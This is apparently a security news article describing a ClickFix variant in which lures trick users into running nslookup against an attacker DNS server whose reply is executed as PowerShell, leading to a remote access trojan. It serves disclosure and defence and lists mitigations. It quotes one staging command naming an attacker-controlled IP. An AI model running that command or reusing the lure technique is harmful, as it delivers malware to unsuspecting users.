Attackers Turn DNS Into Malware Channel in Latest ClickFix Variant

CyberDefender 7 mins0

ClickFix — a social-engineering malware delivery tactic — has evolved once again. In a newly observed campaign, threat actors are leveraging DNS lookups via the Windows nslookup utility to fetch and execute malicious PowerShell code, making DNS a lightweight staging channel for malware distribution. This represents one of the first known cases where standard DNS infrastructure is directly abused to deliver live payloads as part of a ClickFix workflow.

What is ClickFix?

The ClickFix technique is a social-engineering framework wherein users are tricked into manually executing commands that ultimately lead to malware execution. Traditionally, attackers employ:

  • Phishing or malvertising redirects
  • Fake CAPTCHA or “system error/fix” lures
  • Window prompts disguised as legitimate UI

Once the victim follows the on-screen instructions, they are led to paste or run a command in cmd.exe or PowerShell, which then retrieves and executes malicious code.

The DNS Twist: From HTTP to nslookup

In this new variant, attackers are taking advantage of DNS rather than conventional web channels to stage malware. This approach involves the following key elements:

  1. Malicious Lure: The victim is guided by a convincing on-screen prompt (e.g., “Fix your system error”) to run a command.
  2. Custom DNS Server: Instead of using the system’s default DNS resolver, a hard-coded malicious DNS server is queried.
  3. nslookup Trick: The nslookup command is crafted to contact the attacker-controlled DNS server and retrieve a response containing a PowerShell payload.

The DNS reply includes a specially formatted “NAME:” field that actually contains a PowerShell command string. This string is then parsed and executed on the victim’s host to kick off the next stage of the attack.

By using DNS for staging, attackers benefit in two key ways:

  • Stealth and evasion: DNS traffic is often considered benign and allowed across networks, reducing detection likelihood.
  • Blending with normal traffic: Unlike HTTP/HTTPS pulls that can be captured by firewall or proxy logs, DNS lookups are ubiquitous and often less visible to security controls.

Technical Breakdown of the Attack Chain

Here is a simplified breakdown of how this DNS-based ClickFix attack unfolds:

  1. Initial Lure:
    The victim reaches a compromised or fake page that instructs them to run a command via Windows Run or cmd.exe.
  2. nslookup Execution:
    A command such as: nslookup example.com 84.21.189.20 is executed. Here, 84.21.189.20 is a malicious DNS server controlled by the attacker.
  3. Payload Delivery via DNS:
    The DNS server responds with a crafted “NAME: …” output. The nslookup output is then filtered and executed as a PowerShell command.
  4. Secondary Payload Fetch:
    This command fetches additional components — such as ZIP archives — from attacker infrastructure.
  5. Final Malware Execution:
    Extracted scripts and executables ultimately launch a remote access trojan (e.g., ModeloRAT), giving the adversary persistent control.

Why This Matters

1. DNS as a Covert Delivery Channel

Using DNS for payload delivery isn’t just novel — it bypasses many traditional perimeter defenses. Firewalls and IDS/IPS often focus on HTTP/HTTPS and other protocols, while DNS is treated as routine infrastructure traffic. The result: malicious content may pass under the radar.

2. Increased Evasion Against Endpoint Controls

By embedding the next-stage payload in the output of a seemingly legitimate OS utility (nslookup), the command execution chain can bypass heuristic detections that focus on remote web fetches and known C2 URLs.

3. Rapid Iteration of Social Engineering Techniques

ClickFix continues to evolve. Earlier variants used fake Windows Update animations, application prompts, or window glitches to convince users to run dangerous commands. This DNS-based variation adds another layer of sophistication.

Mitigations and Detection

To defend against this class of attack, organisations should consider:

  • Endpoint Security Controls: Ensure strict application control policies that prevent arbitrary execution of PowerShell commands triggered via user action.
  • DNS Logging & Analysis: Monitor for anomalous DNS queries, especially those targeting external IPs instead of known DNS resolvers.
  • User Awareness Training: Educate users on never executing unfamiliar commands in system consoles, especially when prompted by browser prompts or unfamiliar pages.
  • Network Segmentation: Restrict direct access to internal DNS servers to prevent easy redirection to attacker-controlled servers.

Conclusion

The newly disclosed ClickFix variant highlights a concerning trend: adversaries are innovating rapidly around social engineering and abuse of common system tools. By turning DNS into a viable channel for payload staging, attackers can dodge conventional detections and blend malicious activity into normal network behavior. This underscores the need for defense-in-depth security controls, rigorous monitoring of DNS behavior, and continuous user education to recognize and avoid social-engineering traps.

CyberDefender